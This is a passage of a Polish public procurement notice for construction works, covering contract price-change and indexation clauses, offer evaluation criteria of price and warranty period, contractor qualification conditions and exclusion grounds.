w chwili zawarcia umowy, a nie powstałej z winy Zamawiającego ani<br/>Wykonawcy, bez żadnych negatywnych skutków prawnych i finansowych. W takim przypadku wynagrodzenie Wykonawcy<br/>zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty,<br/>które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,<br/>§22.<br/>1. Zamawiający dopuszcza zmianę wynagrodzenia w przypadku:<br/>1) zmniejszenia zakresu robót. Wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone o wartość robót, o które<br/>pomniejszono zakres przedmiotu Umowy. Wartość tych robót zostanie wyliczona na podstawie informacji o stawkach<br/>robocizny kosztorysowej wskazanych w kosztorysie ofertowym wykonawcy oraz o cenach pracy sprzętu budowlanego i<br/>materiałów budowlanych.<br/>2) dopuszcza się zmianę wysokości wynagrodzenia należnego Wykonawcy, w formie pisemnego aneksu, w przypadku<br/>wystąpienia jednej z następujących okoliczności:<br/>a) zmiany stawki podatku od towarów i usług, akcyzowego<br/>b) wprowadzenia nowego podatku lub opłaty wpływającej istotnie na koszt realizacji umowy<br/>c) zmiany wysokości minimalnego wynagrodzenia albo wysokości minimalnej stawki godzinowej ustalonych na podstawie<br/>przepisów o minimalnym wynagrodzeniu za pracę,<br/>d) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę.<br/>2. Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w ust 1 pkt 2 lit. a, będzie odnosić<br/>się wyłącznie do części przedmiotu umowy zrealizowanej, zgodnie z terminami ustalonymi umową, po dniu wejścia w życie<br/>przepisów zmieniających stawkę podatku od towarów i usług lub akcyzowego oraz wyłącznie do części przedmiotu umowy,<br/>do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług lub akcyzowego<br/>3. W przypadku zmiany, o której mowa w ust 1 pkt 2 lit a, wartość wynagrodzenia netto nie zmieni się, a wartość<br/>wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów.<br/>4. Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w ust 1 pkt 2 lit a, b lub c, będzie<br/>obejmować wyłącznie część wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości<br/>kosztów wykonania umowy przez Wykonawcę w związku z wejściem w życie przepisów odpowiednio zmieniających<br/>wysokość podatków, minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej lub dokonujących<br/>zmian w zakresie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne.<br/>5. W przypadku zmiany, o której mowa w ust 1 pkt 2 lit c, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę<br/>odpowiadającą wzrostowi kosztu Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń osób wchodzących w<br/>skład zespołu Wykonawcy, do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę albo wysokości<br/>minimalnej stawki godzinowej, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego<br/>wynagrodzenia albo stawki godzinowej. Kwota odpowiadająca wzrostowi kosztu Wykonawcy będzie odnosić się wyłącznie<br/>do części wynagrodzenia osób świadczących usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi,<br/>w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy.<br/>6. W przypadku zmiany, o której mowa w ust 1 pkt 2 lit d, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę<br/>odpowiadającą zmianie kosztu ponoszonego w związku z wypłatą wynagrodzenia osobom wchodzącym w skład zespołu<br/>Wykonawcy realizującego przedmiot umowy. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się<br/>wyłącznie do części wynagrodzenia osób realizujących przedmiot umowy, o których mowa w ust 5 odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 Kryteria oceny i wyboru ofert i ich znaczenie:<br/>l) KI: Cena -60%.<br/>2) K2: Okres gwarancji i rękojmi- 40 %<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>Ad 1) Kryterium: Cena (na podstawie ceny za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w formularzu Oferty) -<br/>znaczenie w ocenie 60% (60 pkt)<br/>Punkty zostaną przyznane wg wzoru:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu /Cena badanej oferty brutto X 60 pkt;<br/>Maksymalna ilość punktów w ramach tego kryterium: 60 punktów<br/>Ad 2) Kryterium: okres gwarancji i rękojmi- znaczenie w ocenie 40%.<br/>Punkty za kryterium „okres gwarancji i rękojmi ” zostaną przyznane w skali punktowej do 40 pkt., na podstawie oświadczenia<br/>wykonawcy złożonego w formularzu ofertowym. Okres rękojmi będzie wynosił tyle samo ile zaproponowany w ofercie przez<br/>Wykonawcę okres gwarancji.<br/>Maksymalny okres gwarancji do oceny ofert wynosi 5 lat. Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 5 lat do oceny<br/>ofert zostanie przyjęty okres 5 lat. Wykonawca, który zaoferuje najkorzystniejszy okres (5 lat) otrzymuje maksymalna liczbę punktów<br/>w ramach kryterium gwarancja<br/>Liczba punktów w ramach kryterium ,,okresu gwarancji” wylicza się następująco:<br/>. Okres gwarancji i rękojmi (w latach) Liczba przyznanych pkt<br/>3 lata 0<br/>4 lata 20<br/>. 5 lat 40<br/>Minimalny wymagany okres gwarancji i rękojmi to 3 lata. Punkty w kryterium „okres gwarancji i rękojmi&#34; zostaną przyznane tylko w<br/>przypadku złożenia przez Wykonawcę oświadczenia, na podstawie którego będzie można przyznać punkty w tym kryterium. W<br/>przypadku nie złożenia oświadczenia (nie wpisania okresu oferowanej gwarancji) Zamawiający uzna, że zaoferowano 3 lata i<br/>przyzna 0 pkt. W przypadku zadeklarowania krótszego okresu gwarancji, podania kilku okresów lub podania okresów w niepełnych<br/>latach oferta Wykonawcy zostanie odrzucona na podstawie art. art. 226 ust. 1 pkt 5 ustawy Prawo zamówień publicznych.<br/>Za najkorzystniejszą uznana zostanie ta oferta, która uzyska najwyższą liczbę punktów (P=Kl+K2):<br/>P - wynik oceny<br/>K1 - liczba punktów uzyskanych w kryterium cena<br/>K2 - liczba punktów uzyskanych w kryterium okres gwarancji<br/>Liczba uzyskanych punktów będzie zaokrąglana do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rękpjmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wskazuje żadnego warunku w tym zakresie.<br/>4) Zdolności technicznej lub zawodowej:<br/>Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie i uzna, że warunek ten zostanie spełniony, jeżeli:<br/>4.1) Wykonawca wykaże, że należycie wykonał w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie; co najmniej:<br/>a) dwie roboty budowlane polegające na budowie, rozbudowie przebudowie lub remoncie budynku o wartości prac co<br/>najmniej 800 000,00 zł brutto,<br/>Każda robota budowlana wykazywana na potwierdzenie spełnienia powyższych warunków musi być wykonana w ramach<br/>jednej osobnej umowy (kontraktu) na każdą robotę. Zamawiający nie dopuszcza łączenia robót budowlanych z różnych<br/>kontraktów w celu ich zsumowania dla osiągnięcia określonej wartości np. wartość remontu/modernizacji/przebudowy<br/>budynku<br/>W przypadku gdy Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z<br/>innymi wykonawcami np. w konsorcjum, wówczas może wykazać tylko te roboty budowlane, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył (wykonywał).<br/>W przypadku, gdy wykazywana robota budowlana realizowana była z innymi robotami budowlanymi, usługami, lub<br/>dostawami niewymienionymi w ust. 2 pkt 4, lit a Wykonawca musi określić wartość tylko tej roboty budowalnej, która<br/>potwierdza spełnienie warunków udziału w niniejszym postępowaniu.<br/>Okresy wyrażone w latach liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>b) dysponuje kadrą techniczną posiadającą uprawnienia i kwalifikacje tj:<br/>Wykonawca dysponuje lub będzie dysponować na etapie realizacji zamówienia osobami, które będą wykonywać przedmiot<br/>zamówienia, spełniającymi następujące wymagania:<br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierownika budowy –<br/>posiadająca uprawnienia w specjalności konstrukcyjno-budowlanej oraz posiadającą min. 3 letnie doświadczenie w<br/>wykonywaniu funkcji na stanowisku: kierownik budowy,<br/>-- co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót elektrycznych – posiadającą uprawnienia<br/>budowlane - w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz<br/>posiadającą min. 2 letnie doświadczenie w wykonywaniu funkcji na stanowisku: kierownik robót/budowy/<br/>- co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót sanitarnych -posiadającą uprawnienia budowlane w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych - oraz posiadającą min. 2<br/>letnie doświadczenie w wykonywaniu funkcji na stanowisku: kierownik robót/budowy<br/>Zamawiający dopuszcza połączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje<br/>wszystkich warunków wymaganych dla poszczególnych funkcji.<br/>3. Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo<br/>budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub<br/>odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane<br/>oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, które<br/>pozwalać będą na pełnienie określonych funkcji w zakresie objętym umową.<br/>4. W przypadku złożenia przez Wykonawcę dokumentu/oświadczenia na potwierdzenie warunków udziału w postępowaniu,<br/>z którego będą wynikać kwoty wyrażone w innej walucie niż PLN, Zamawiający dokona przeliczenia na PLN wg średniego<br/>kursu Narodowego Banku Polskiego z dnia, w którym opublikowano ogłoszenie o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli dniem publikacji ogłoszenia będzie sobota lub dzień wolny od pracy, wówczas jako kurs przeliczeniowy<br/>waluty Zamawiający przyjmie średni kurs Narodowego Banku Polskiego z pierwszego dnia roboczego po dniu publikacji<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych,<br/>5. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z<br/>nimi stosunków prawnych.<br/>6. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu z postępowania o<br/>udzielenie zamówienia na podstawie art. 108 ust. 1 ustawy Prawo zamówień publicznych tj.:<br/>Z postępowania o udzielenie zamówienia wyklucza się wykonawcę:<br/>1) będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a) udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa<br/>skarbowego, o którym mowa w art. 258 Kodeksu karnego,<br/>b) handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego,<br/>c) o którym mowa w art. 228–230a, art. 250a Kodeksu karnego, w art. 46–48 ustawy z dnia 25 czerwca 2010 r. o sporcie<br/>(Dz. U. z 2022 r. poz. 1599 i 2185) lub w art. 54 ust. 1–4 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków<br/>spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (Dz. U. z 2023 r. poz. 826),<br/>d) finansowania przestępstwa o charakterze terrorystycznym, o którym mowa w art. 165a Kodeksu karnego, lub<br/>przestępstwo udaremniania lub utrudniania stwierdzenia przestępnego pochodzenia pieniędzy lub ukrywania ich<br/>pochodzenia, o którym mowa w art. 299 Kodeksu karnego,<br/>e) o charakterze terrorystycznym, o którym mowa w art. 115 S 20 Kodeksu karnego, lub mające na celu popełnienie tego<br/>przestępstwa,<br/>f) powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa w art. 9 ust. 2 ustawy z dnia 15 czerwca<br/>2012 r. o skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium<br/>Rzeczypospolitej Polskiej (Dz. U. poz. 769),<br/>g) przeciwko obrotowi gospodarczemu, o których mowa w art. 296-307 Kodeksu karnego, przestępstwo oszustwa, o którym<br/>mowa w art. 286 Kodeksu karnego, przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270-277d<br/>Kodeksu karnego, lub przestępstwo skarbowe,<br/>h) o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzania wykonywania pracy<br/>cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej - lub za odpowiedni czyn<br/>zabroniony określony w przepisach prawa obcego;<br/>2) jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub<br/>partnerskiej albo komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie<br/>skazano za przestępstwo, o którym mowa w pkt 1 ;<br/>3) wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem<br/>podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że wykonawca odpowiednio przed upływem<br/>terminu do składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert<br/>dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>4) wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5) jeżeli zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że wykonawca zawarł z innymi<br/>wykonawcami porozumienie mające na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy<br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty,<br/>oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub<br/>wnioski niezależnie od siebie;<br/>6) jeżeli, w przypadkach, o których mowa w art. 85 ust. IJ doszło do zakłócenia konkurencji wynikającego z wcześniejszego<br/>zaangażowania tego wykonawcy lub podmiotu, który należy z wykonawcą do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji<br/>może być wyeliminowane w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia.<br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych: w<br/>art. 109 ust. 1 pkt. 4 Pzp, tj.:<br/>a) w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł<br/>układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia oraz<br/>spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 - stanowiący załącznik nr 4 do SWZ;<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców np. spółka cywilna, konsorcjum) oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie..<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują :<br/>2) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty;<br/>Wymaga się aby Wykonawca wykazał należyte wykonanie min.:<br/>- co najmniej 2 roboty budowlane polegające na budowie, rozbudowie lub przebudowie budynku o wartości prac co najmniej 800<br/>000,00 zł brutto,<br/>3) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.Wykonawcę wyklucza sie<br/>na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na<br/>Ukrainę rozpoczętej w dniu 24 lutego 2022 r. ((Dz.U. z 2022 r. poz. 835), zwana dalej „ustawą sankcyjną” z postępowania o<br/>udzielenie zamówienia publicznego<br/>1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia<br/>oraz spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 - stanowiący załącznik nr 4 do SWZ;<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców np. spółka cywilna, konsorcjum) oświadczenie składa<br/>każdy z wykonawców wspólnie ubiegających się o zamówienie..<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują :<br/>1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>4) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o<br/>których mowa w ust. 4 pkt 1, składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono<br/>upadłości,<br/>jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem<br/>terminu składania ofert.<br/>5) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której<br/>dokument dotyczy, nie wydaje się dokumentów, o których mowa w ust. 4 pkt 1, zastępuje się je dokumentem zawierającym<br/>odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie<br/>osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszka nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>Dokumenty, o których mowa wyżej powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy<br/>cd zmiany umowy paragraf 22:<br/>7. Dopuszcza się również możliwość wprowadzenia zmian umowy, dotyczących wynagrodzenia Wykonawcy, poprzez jego<br/>waloryzację w sytuacji spełnienia niżej wymienionych wymagań:<br/>1) zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia; Poziom zmiany ceny materiałów lub kosztów<br/>związanych z realizacją zamówienia uprawniający Strony Umowy do żądania zmiany wynagrodzenia ustala się na 5 % w<br/>stosunku do poziomu cen tych samych materiałów lub kosztów dla miesiąca poprzedzającego dzień składania ofert.<br/>Początkowy termin ustalenia zmiany wynagrodzenia ustala się na dzień zaistnienia przesłanki w postaci wzrostu<br/>wynagrodzenia ceny materiałów lub kosztów związanych z realizacją zamówienia o 5%. Ustalone zostanie to na podstawie<br/>wskaźnika cen produkcji budowlano-montażowej, ustalanego przez Prezesa Głównego Urzędu Statystycznego i<br/>ogłaszanego w Dzienniku Urzędowym RP „Monitor Polski” .W przypadku gdyby wskaźniki przestały być dostępne,<br/>zastosowanie znajdą inne, najbardziej zbliżone, wskaźniki publikowane przez Prezesa GUS.<br/>W sytuacji wzrostu ceny materiałów lub kosztów związanych z realizacją zamówienia powyżej 5% Wykonawca może złożyć<br/>Zamawiającemu pisemny wniosek o zmianę Umowy w zakresie płatności po zmianie ceny materiałów lub kosztów<br/>związanych z realizacją zamówienia. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i wskazanie<br/>podstaw prawnych oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy.<br/>Zmiana wynagrodzenia w tym trybie nie może prowadzić do wzrostu zysku Wykonawcy, a jedynie ma prowadzić do<br/>zrekompensowania kosztów jakie będzie ponosił w związku z realizacją umowy. W celu wykazania wpływu zmian, o których<br/>mowa w niniejszym ust., na koszty wykonania umowy, Wykonawca przedstawi Zamawiającemu szczegółową kalkulację cen<br/>materiałów lub kosztów według stanu sprzed danej zmiany cen materiałów lub kosztów uwzględniającą dane z kosztorysu<br/>ofertowego (w tym szczegółowego) oraz szczegółową kalkulację cen materiałów lub kosztów według stanu po danej<br/>zmianie cen materiałów lub kosztów oraz wskaże kwotę (w tym przedłoży kosztorys szczegółowy), o jaką wynagrodzenie<br/>umowne powinno ulec zmianie. Zamawiający ustosunkuje się do przedstawionych kalkulacji, w szczególności przez<br/>zaakceptowanie wskazanej przez Wykonawcę kwoty lub przez zgłoszenie zastrzeżeń, wskazanie omyłek rachunkowych lub<br/>żądanie wyjaśnień lub dowodów co do poszczególnych elementów kalkulacji. W wypadku akceptacji kalkulacji Wykonawcy,<br/>strony zawrą aneks zmieniający Umowę w zakresie wynagrodzenia należnego Wykonawcy o kwotę wynikającą z kalkulacji<br/>W sytuacji spadku ceny materiałów lub kosztów związanych z realizacją zamówienia powyżej 5% Zamawiający może złożyć<br/>Wykonawcy pisemną informację o zmianę Umowy w zakresie płatności po zmianie ceny materiałów lub kosztów związanych<br/>z realizacją zamówienia. Informacja powinna zawierać wyczerpujące uzasadnienie faktyczne i wskazanie podstaw prawnych<br/>oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie Umowy.<br/>Wysokość wynagrodzenia Wykonawcy określonego w rozliczeniu częściowym ulegnie waloryzacji o zmianę wskaźnika cen<br/>produkcji budowlano-montażowej, ustalanego przez Prezesa Głównego Urzędu Statystycznego i ogłaszanego w Dzienniku<br/>Urzędowym RP „Monitor Polski” .W przypadku gdyby wskaźniki przestały być dostępne, zastosowanie znajdą inne,<br/>najbardziej zbliżone, wskaźniki publikowane przez Prezesa GUS.<br/>Wniosek o podwyższenie wynagrodzenia złożyć można nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia umowy.<br/>Kolejny wniosek może złożyć po zaistnieniu kolejnej sytuacji wzrostu ceny materiałów lub kosztów związanych z realizacją<br/>zamówienia powyżej 5% w stosunku do miesiąca, w którym podpisano aneks dotyczący pierwszej waloryzacji. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty<br/>Pełnomocnictwo - jeśli dotyczy<br/>cd zmiany umowy paragraf 22<br/>8. Obowiązek wykazania wpływu zmian, o których mowa w ust. 7 na zmianę wynagrodzenia, o którym mowa w § 10 Umowy,<br/>należy do Wykonawcy pod rygorem odmowy dokonania zmiany Umowy przez Zamawiającego.<br/>9. Waloryzacja zgodnie z ust. 7 niniejszego paragrafu dotyczy tylko części zamówienia, która nie została wykonana do dnia<br/>waloryzacji wynagrodzenia i nieodebrana przez Zamawiającego przed dniem złożenia wniosku o waloryzację.<br/>10. Łączna maksymalna wartość wszystkich zmian wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania<br/>postanowień o zasadach wprowadzania zmian wysokości wynagrodzenia to 15% wynagrodzenia, o którym mowa w § 10 ust 11. Wartość zmiany (WZ) o której mowa w ust. 7 określa się na podstawie wzoru: WZ = (W x F)/100, przy czym: W -<br/>wynagrodzenie netto za zakres Przedmiotu Umowy, niezrealizowany jeszcze przez Wykonawcę i nieodebrany przez<br/>Zamawiającego przed dniem złożenia wniosku, F – średnia arytmetyczna trzech następujących po sobie przed dniem<br/>złożenia wniosku wartości zmiany cen materiałów lub kosztów związanych z realizacją Przedmiotu umowy wynikających z<br/>komunikatów Prezesa GUS;<br/>12. Postanowień umownych w zakresie waloryzacji nie stosuje się od chwili osiągnięcia limitu, o którym mowa w ust. 10.<br/>13. Maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie waloryzacji zgodnie z ust. 10<br/>niniejszego paragrafu, nie przekroczy 15 % wynagrodzenia brutto, o którym mowa w § 10 ust. 1. Zastrzega się, iż w<br/>przypadku, gdy 